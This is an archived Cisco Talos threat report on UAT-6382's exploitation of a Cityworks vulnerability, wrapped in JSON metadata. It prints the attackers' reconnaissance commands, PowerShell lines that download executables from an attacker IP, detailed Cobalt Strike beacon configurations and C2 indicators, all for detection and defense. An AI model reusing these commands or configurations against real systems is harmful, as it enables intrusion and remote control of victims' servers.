{
	"id": "c5b90ac3-78d8-4913-bf37-c1535f552f39",
	"created_at": "2026-04-06T00:20:54.036045Z",
	"updated_at": "2026-04-10T13:12:53.908917Z",
	"deleted_at": null,
	"sha1_hash": "6152483e59b406af1acbe7fab823da7da3b426e3",
	"title": "UAT-6382 exploits Cityworks zero-day vulnerability to deliver malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 345181,
	"plain_text": "UAT-6382 exploits Cityworks zero-day vulnerability to deliver\r\nmalware\r\nBy Asheer Malhotra\r\nPublished: 2025-05-22 · Archived: 2026-04-05 16:41:45 UTC\r\nCisco Talos has observed exploitation of CVE-2025-0994, a remote-code-execution vulnerability in\r\nCityworks, a popular asset management system.  \r\nThe Cybersecurity and Infrastructure Security Agency (CISA) and Trimble have both released advisories\r\npertaining to this vulnerability, with Trimble’s advisory specifically listing indicators of compromise\r\n(IOCs) related to the intrusion exploiting the CVE.  \r\nIOCs pertaining to intrusions discovered by Talos that involve the exploitation of CVE-2025-0994 overlap\r\nwith those listed in Trimble’s advisory.  \r\nTalos clusters this set of intrusions, exploiting CVE-2025-0994, under the “UAT-6382” umbrella of\r\nactivity. Based on tooling and tactics, techniques and procedures (TTPs) employed by the threat actor,\r\nTalos assesses with high confidence that the exploitation and subsequent post-compromise activity is\r\ncarried out by Chinese-speaking threat actors.  \r\nPost-compromise activity involves the rapid deployment of web shells such as AntSword and\r\nchinatso/Chopper on the underlying IIS web servers. UAT-6382 also employed the use of Rust-based\r\nloaders to deploy Cobalt Strike and VSHell malware to maintain long-term persistent access.  \r\nWe track the Rust-based loaders as “TetraLoader,” built using a recently publicly available malware\r\nbuilding framework called “MaLoader.” MaLoader, written in Simplified Chinese, allows its operators to\r\nwrap shellcode and other payloads into a Rust-based binary, resulting in the creation of TetraLoader.\r\nTalos has found intrusions in enterprise networks of local governing bodies in the United States (U.S.), beginning\r\nJanuary 2025 when initial exploitation first took place. UAT-6382 successfully exploited CVE-2025-0944,\r\nconducted reconnaissance and rapidly deployed a variety of web shells and custom-made malware to maintain\r\nlong-term access. Upon gaining access, UAT-6382 expressed a clear interest in pivoting to systems related to\r\nutilities management. \r\nThe web shells, including AntSword, chinatso/Chopper and generic file uploaders, contained messaging written in\r\nthe Chinese language. Furthermore, the custom tooling, TetraLoader, was built using a malware-builder called\r\n“MaLoader” that is also written in Simplified Chinese. Based on the nature of this tooling, TTPs, hands-on-keyboard activity and victimology, Talos assesses with high confidence that UAT-6382 is a Chinese-speaking\r\nthreat actor.\r\nInitial reconnaissance \r\nSuccessful exploitation of the vulnerable Cityworks application leads to the attackers conducting preliminary\r\nreconnaissance to identify and fingerprint the server: \r\nhttps://blog.talosintelligence.com/uat-6382-exploits-cityworks-vulnerability/\r\nPage 1 of 13\n\ncmd.exe /c ipconfig\r\ncmd.exe /c pwd\r\ncmd.exe /c dir\r\ncmd.exe /c dir ..\r\ncmd.exe /c dir c:\\\r\ncmd.exe /c dir c:\\inetpub\r\ncmd.exe /c tasklist\r\n Specific folders were enumerated before attempting to place web shells in them: \r\ncmd.exe /c dir c:\\inetpub\\wwwroot\r\ncmd.exe /c c:\\inetpub\\wwwroot\\CityworksServer\\WebSite\r\ncmd.exe /c dir c:\\inetpub\\wwwroot\\CityworksServer\\WebSite\\Assets\r\nUAT-6382 heavily utilizes web shells \r\nInitial reconnaissance almost immediately led to the deployment of web shells to establish backdoor entry into the\r\ncompromised network. These web shells consisted of multiple variations of AntSword, chinatso and Behinder\r\nalong with additional generic file uploaders containing messages written in the Chinese language.\r\nFigure 1. ASP based file uploader deployed by UAT-6382.\r\nFile enumeration and staging for exfiltration \r\nUAT-6382 enumerated multiple directories on servers of interest to identify files of interest to them and then\r\nstaged them in directories where they had deployed web shells for easy exfiltration: \r\nhttps://blog.talosintelligence.com/uat-6382-exploits-cityworks-vulnerability/\r\nPage 2 of 13\n\ncmd.exe /c dir c:\\inetpub\\wwwroot\\CityworksServer\\\r\ncmd.exe /c copy c:\\inetpub\\wwwroot\\CityworksServer\\\u003cbackup_archives\u003e c:\\inetpub\\wwwroot\\CityworksServ\r\nDeployment of backdoors \r\nUAT-6382 downloaded and deployed multiple backdoors on compromised systems via PowerShell: \r\ncmd[.]exe /c powershell -Command Invoke-WebRequest -Uri 'hxxp[://]192[.]210[.]239[.]172:3219/LVLWPH[\r\ncmd.exe /c powershell -Command Invoke-WebRequest -Uri 'http://192[.]210[.]239[.]172:3219/MCUCAT[.]exe\r\npowershell -Command Invoke-WebRequest -Uri 'http://192[.]210[.]239[.]172:3219/TJPLYT[.]exe' -OutFile\r\ncmd.exe /c powershell -Command Invoke-WebRequest -Uri 'http://192[.]210[.]239[.]172:3219/z44[.]exe' -\r\nThe implants Talos recovered are Rust-based loaders containing an encoded or encrypted payload. The payload is\r\ndecoded/decrypted and injected into a benign process by the loader component. We track the loaders as\r\n“TetraLoader.”\r\nTetraLoader analysis \r\nTetraLoader is a simple Rust-based loader. It will decode an embedded payload and inject it into a benign process\r\nsuch as notepad[.]exe to activate the payload. Talos has so far found two types of payloads deployed by\r\nTetraLoader on the infected endpoints: \r\n1. Cobalt Strike beacons: These are position-independent, in-memory Cobalt Strike beacon shellcodes that\r\nare injected into a specified benign process by TetraLoader. \r\n2. VShell stager: Position independent shellcode, we’ve identified as a stager for VShell, that talks to a\r\nhardcoded C2 server and executes code issued to it. \r\nTetraLoader is built using a relatively new payload builder framework known as “MaLoader,” which first\r\nappeared on GitHub in December 2024. MaLoader has multiple options to encode and embed shellcodes into\r\nTetraLoader, the Rust-based container. \r\nhttps://blog.talosintelligence.com/uat-6382-exploits-cityworks-vulnerability/\r\nPage 3 of 13\n\nFigure 2. MaLoader’s builder interface\r\nMaLoader is written in Simplified Chinese, indicating that threat actors that employed it likely knew the language\r\nto a substantial degree of proficiency.\r\nCobalt Strike beacons \r\nThe Cobalt Strike beacons are relatively straightforward, with minimal changes as compared to traditionally\r\ngenerated Cobalt Strike beacons. One of the beacons Talos discovered reaches out to the command-and-control\r\n(C2) domain “cdn[.]lgaircon[.]xyz” and specifically consists of the following configuration settings:\r\nBeaconType - HTTPS\r\nPort - 443\r\nhttps://blog.talosintelligence.com/uat-6382-exploits-cityworks-vulnerability/\r\nPage 4 of 13\n\nSleepTime - 45000\r\nMaxGetSize - 2801745\r\nJitter - 37\r\nMaxDNS - Not Found\r\nPublicKey - b'0\\x81\\x9f0\\r\\x06\\t*\\x86H\\x86\\xf7\\r\\x01\\x01\\x01\\x05\\x00\\x03\\x81\\x8d\\x000\\x81\\x89\\x02\\x81\r\nC2Server - cdn[.]lgaircon[.]xyz,/jquery-3[.]3[.]1[.]min[.]js\r\nUserAgent - Not Found\r\nHttpPostUri - /jquery-3[.]3[.]2[.]min[.]js\r\nHttpGet_Metadata - Not Found\r\nHttpPost_Metadata - Not Found\r\nSpawnTo - b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\nPipeName - Not Found\r\nDNS_Idle - Not Found\r\nDNS_Sleep - Not Found\r\nSSH_Host - Not Found\r\nSSH_Port - Not Found\r\nSSH_Username - Not Found\r\nSSH_Password_Plaintext - Not Found\r\nSSH_Password_Pubkey - Not Found\r\nHttpGet_Verb - GET\r\nHttpPost_Verb - POST\r\nHttpPostChunk - 0\r\nSpawnto_x86 - %windir%\\syswow64\\dllhost[.]exe\r\nSpawnto_x64 - %windir%\\sysnative\\dllhost[.]exe\r\nCryptoScheme - 0\r\nProxy_Config - Not Found\r\nProxy_User - Not Found\r\nProxy_Password - Not Found\r\nProxy_Behavior - Use IE settings\r\nWatermark - 987654321\r\nbStageCleanup - True\r\nbCFGCaution - False\r\nKillDate - 0\r\nbProcInject_StartRWX - False\r\nbProcInject_UseRWX - False\r\nbProcInject_MinAllocSize - 17500\r\nhttps://blog.talosintelligence.com/uat-6382-exploits-cityworks-vulnerability/\r\nPage 5 of 13\n\nProcInject_PrependAppend_x86 - b'\\x90\\x90'\r\n Empty\r\nProcInject_PrependAppend_x64 - b'\\x90\\x90'\r\n Empty\r\nProcInject_Execute - ntdll:RtlUserThreadStart\r\n CreateThread\r\n NtQueueApcThread-s\r\n CreateRemoteThread\r\n RtlCreateUserThread\r\nProcInject_AllocationMethod - NtMapViewOfSection\r\nbUsesCookies - True\r\nHostHeader - Host: cdn[.]lgaircon[.]xyz\r\nA second beacon using the same C2 domain consists of the following more detailed configuration:\r\nBeaconType - HTTPS\r\nPort - 443\r\nSleepTime - 35000\r\nMaxGetSize - 2097152\r\nJitter - 30\r\nMaxDNS - Not Found\r\nPublicKey_MD5 - 00c96a736d29c55e29c5e3291aedb0fd\r\nC2Server - lgaircon[.]xyz,/owa/OPWiaTU-ZEbuwIAKGPHoQAP006-PTsjBGKQUxZorq2\r\nUserAgent - Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko)\r\nHttpPostUri - /owa/idQ0RKiA2O1i9KKDzKRdmIBmkA8uQxmFzpBGRzGjaqG\r\nMalleable_C2_Instructions - NetBIOS decode 'a'\r\nHttpGet_Metadata - ConstHeaders\r\n Host: lgaircon[.]xyz\r\n Accept: */ *\r\n Cookie: MicrosoftApplicationsTelemetryDeviceId=95c18d8-4dce9854;ClientId=1C0F6C5D91\r\n ConstParams\r\n path=/calendar\r\n Metadata\r\n netbios\r\n parameter \"wa\"\r\nhttps://blog.talosintelligence.com/uat-6382-exploits-cityworks-vulnerability/\r\nPage 6 of 13\n\nHttpPost_Metadata - ConstHeaders\r\n Host: lgaircon[.]xyz\r\n Accept: */ *\r\n SessionId\r\n netbios\r\n prepend \"wla42=\"\r\n prepend \"xid=730bf7;\"\r\n prepend \"MSPAuth=3EkAjDKjI;\"\r\n prepend \"ClientId=1C0F6C5D910F9;\"\r\n prepend \"MicrosoftApplicationsTelemetryDeviceId=95c18d8-4dce9854;\"\r\n header \"Cookie\"\r\n Output\r\n netbios\r\n parameter \"wa\"\r\nPipeName - Not Found\r\nDNS_Idle - Not Found\r\nDNS_Sleep - Not Found\r\nSSH_Host - Not Found\r\nSSH_Port - Not Found\r\nSSH_Username - Not Found\r\nSSH_Password_Plaintext - Not Found\r\nSSH_Password_Pubkey - Not Found\r\nSSH_Banner -\r\nHttpGet_Verb - GET\r\nHttpPost_Verb - GET\r\nHttpPostChunk - 96\r\nSpawnto_x86 - %windir%\\syswow64\\gpupdate[.]exe\r\nSpawnto_x64 - %windir%\\sysnative\\gpupdate[.]exe\r\nCryptoScheme - 0\r\nProxy_Config - Not Found\r\nProxy_User - Not Found\r\nProxy_Password - Not Found\r\nProxy_Behavior - Use IE settings\r\nWatermark_Hash - NtZOV6JzDr9QkEnX6bobPg==\r\nWatermark - 987654321\r\nbStageCleanup - True\r\nbCFGCaution - False\r\nKillDate - 0\r\nhttps://blog.talosintelligence.com/uat-6382-exploits-cityworks-vulnerability/\r\nPage 7 of 13\n\nbProcInject_StartRWX - True\r\nbProcInject_UseRWX - False\r\nbProcInject_MinAllocSize - 26808\r\nProcInject_PrependAppend_x86 - b'\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90'\r\n Empty\r\nProcInject_PrependAppend_x64 - b'\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90'\r\n Empty\r\nProcInject_Execute - ntdll[.]dll:RtlUserThreadStart\r\n NtQueueApcThread-s\r\n SetThreadContext\r\n CreateRemoteThread\r\n kernel32[.]dll:LoadLibraryA\r\n RtlCreateUserThread\r\nProcInject_AllocationMethod - VirtualAllocEx\r\nbUsesCookies - True\r\nHostHeader -\r\nheadersToRemove - Not Found\r\nDNS_Beaconing - Not Found\r\nDNS_get_TypeA - Not Found\r\nDNS_get_TypeAAAA - Not Found\r\nDNS_get_TypeTXT - Not Found\r\nDNS_put_metadata - Not Found\r\nDNS_put_output - Not Found\r\nDNS_resolver - Not Found\r\nDNS_strategy - round-robin\r\nDNS_strategy_rotate_seconds - -1\r\nDNS_strategy_fail_x - -1\r\nDNS_strategy_fail_seconds - -1\r\nRetry_Max_Attempts - 0\r\nRetry_Increase_Attempts - 0\r\nRetry_Duration - 0\r\nAnother beacon reaches out to C2 “www[.]roomako[.]com” and has the following configuration: \r\nBeaconType - HTTPS\r\nPort - 443\r\nSleepTime - 25000\r\nMaxGetSize - 2801745\r\nJitter - 37\r\nMaxDNS - Not Found\r\nhttps://blog.talosintelligence.com/uat-6382-exploits-cityworks-vulnerability/\r\nPage 8 of 13\n\nPublicKey - b\"0\\x81\\x9f0\\r\\x06\\t*\\x86H\\x86\\xf7\\r\\x01\\x01\\x01\\x05\\x00\\x03\\x81\\x8d\\x000\\x81\\x89\\x02\\x81\r\nC2Server - www[.]roomako[.]com,/jquery-3[.]3[.]1[.]min[.]js\r\nUserAgent - Not Found\r\nHttpPostUri - /jquery-3[.]3[.]2[.]min[.]js\r\nHttpGet_Metadata - Not Found\r\nHttpPost_Metadata - Not Found\r\nSpawnTo - b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\nPipeName - Not Found\r\nDNS_Idle - Not Found\r\nDNS_Sleep - Not Found\r\nSSH_Host - Not Found\r\nSSH_Port - Not Found\r\nSSH_Username - Not Found\r\nSSH_Password_Plaintext - Not Found\r\nSSH_Password_Pubkey - Not Found\r\nHttpGet_Verb - GET\r\nHttpPost_Verb - POST\r\nHttpPostChunk - 0\r\nSpawnto_x86 - %windir%\\syswow64\\dllhost[.]exe\r\nSpawnto_x64 - %windir%\\sysnative\\dllhost[.]exe\r\nCryptoScheme - 0\r\nProxy_Config - Not Found\r\nProxy_User - Not Found\r\nProxy_Password - Not Found\r\nProxy_Behavior - Use IE settings\r\nWatermark - 987654321\r\nbStageCleanup - True\r\nbCFGCaution - False\r\nKillDate - 0\r\nbProcInject_StartRWX - False\r\nbProcInject_UseRWX - False\r\nbProcInject_MinAllocSize - 17500\r\nProcInject_PrependAppend_x86 - b'\\x90\\x90\\x90'\r\n Empty\r\nProcInject_PrependAppend_x64 - b'\\x90\\x90\\x90'\r\nhttps://blog.talosintelligence.com/uat-6382-exploits-cityworks-vulnerability/\r\nPage 9 of 13\n\nEmpty\r\nProcInject_Execute - ntdll:RtlUserThreadStart\r\n CreateThread\r\n NtQueueApcThread-s\r\n CreateRemoteThread\r\n RtlCreateUserThread\r\nProcInject_AllocationMethod - NtMapViewOfSection\r\n bUsesCookies - True\r\nHostHeader - Host: www[.]roomako[.]com\r\nVShell stager \r\nThe VShell stager is relatively simple and uses rudimentary socket APIs to connect with a hardcoded C2 server\r\nsuch as “192[.]210[.]239[.]172:2219”. The stager, usually injected into a benign process by TetraLoader, initially\r\nsends a preliminary beacon to the C2 and then waits for a response. The response sent by the C2 is usually a\r\nsingle-byte Xorred payload that is then executed in memory by the implant. This is likely UAT-6382's\r\nmodification in VShell. \r\nFigure 3. Implant receiving and executing shellcode from the C2.\r\nhttps://blog.talosintelligence.com/uat-6382-exploits-cityworks-vulnerability/\r\nPage 10 of 13\n\nThe payload received by the VShell stager is in fact the actual VShell implant. VShell is a GoLang-based implant\r\nthat talks to its C2 and provides a wide variety of remote access trojan-based functionalities, such as the\r\ncapabilities to perform file management, run arbitrary commands, take screenshots and run NPS-based proxies on\r\nthe infected endpoint.\r\nFigure 4. A sample VShell C2 server with one client connected. \r\nLike other Chinese-authored tooling observed in the intrusions, VShell C2 panels are also written in Chinese.\r\nAlthough limited language support for English is available in the panel, it still mostly uses the Chinese language\r\nas seen in Figure 5, indicating that operators need to be familiar with the language to use the panel proficiently. \r\nFigure 5. VShell’s file manager panel uses Chinese even when configured to use English.\r\nCoverage \r\nWays our customers can detect and block this threat are listed below.  \r\nhttps://blog.talosintelligence.com/uat-6382-exploits-cityworks-vulnerability/\r\nPage 11 of 13\n\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware\r\ndetailed in this post. Try Secure Endpoint for free here. \r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of\r\ntheir campaign. You can try Secure Email for free here. \r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat\r\nDefense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this\r\nthreat. \r\nCisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically\r\nand alerts users of potentially unwanted activity on every connected device. \r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco\r\nSecure products. \r\nCisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles. \r\nSecure Access provides seamless transparent and secure access to the internet, cloud services or private\r\napplication no matter where your users work.  Please contact your Cisco account representative or authorized\r\npartner if you are interested in a free trial of Cisco Secure Access. \r\nUmbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and\r\nURLs, whether users are on or off the corporate network.  \r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites\r\nand tests suspicious sites before users access them.  \r\nAdditional protections with context to your specific environment and threat data are available from the Firewall\r\nManagement Center. \r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your\r\nnetwork.  \r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org. \r\nIndicators of compromise (IOCs) \r\nhttps://blog.talosintelligence.com/uat-6382-exploits-cityworks-vulnerability/\r\nPage 12 of 13\n\nThe IOCs can also be found in our GitHub repository here.\r\nTetraLoader \r\n14ed3878b6623c287283a8a80020f68e1cb6bfc37b236f33a95f3a64c4f4611f\r\n4ffc33bdc8527a2e8cb87e49cdc16c3b1480dfc135e507d552f581a67d1850a9\r\n1de72c03927bcd2810ce98205ff871ef1ebf4344fba187e126e50caa1e43250b\r\n1c38e3cda8ac6d79d9da40834367697a209c6b07e6b3ab93b3a4f375b161a901\r\n CobaltStrike beacons \r\nC02d50d0eb3974818091b8dd91a8bbb8cdefd94d4568a4aea8e1dcdd8869f738\r\n Network IOCs \r\ncdn[.]phototagx[.]com\r\nwww[.]roomako[.]com\r\nlgaircon[.]xyz\r\nhttps://www[.]roomako[.]com/jquery-3[.]3[.]1[.]min[.]js\r\nhttps://lgaircon[.]xyz/owa/OPWiaTU-ZEbuwIAKGPHoQAP006-PTsjBGKQUxZorq2\r\nhttps://cdn[.]lgaircon[.]xyz/jquery-3[.]3[.]1[.]min[.]js\r\nhxxps[://]cdn[.]phototagx[.]com/\r\n192[.]210[.]239[.]172\r\nhxxp[://]192[.]210[.]239[.]172:3219/LVLWPH[.]exe\r\nhxxp[://]192[.]210[.]239[.]172:3219/MCUCAT[.]exe\r\nhxxp[://]192[.]210[.]239[.]172:3219/TJPLYT[.]exe\r\nhxxp[://]192[.]210[.]239[.]172:3219/z44[.]exe\r\nSource: https://blog.talosintelligence.com/uat-6382-exploits-cityworks-vulnerability/\r\nhttps://blog.talosintelligence.com/uat-6382-exploits-cityworks-vulnerability/\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.talosintelligence.com/uat-6382-exploits-cityworks-vulnerability/"
	],
	"report_names": [
		"uat-6382-exploits-cityworks-vulnerability"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ee06ebae-7f2e-4523-8684-1d2b037fe18e",
			"created_at": "2026-02-04T02:00:03.713473Z",
			"updated_at": "2026-04-10T02:00:03.954313Z",
			"deleted_at": null,
			"main_name": "UAT-6382",
			"aliases": [],
			"source_name": "MISPGALAXY:UAT-6382",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434854,
	"ts_updated_at": 1775826773,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6152483e59b406af1acbe7fab823da7da3b426e3.pdf",
		"text": "https://archive.orkl.eu/6152483e59b406af1acbe7fab823da7da3b426e3.txt",
		"img": "https://archive.orkl.eu/6152483e59b406af1acbe7fab823da7da3b426e3.jpg"
	}
}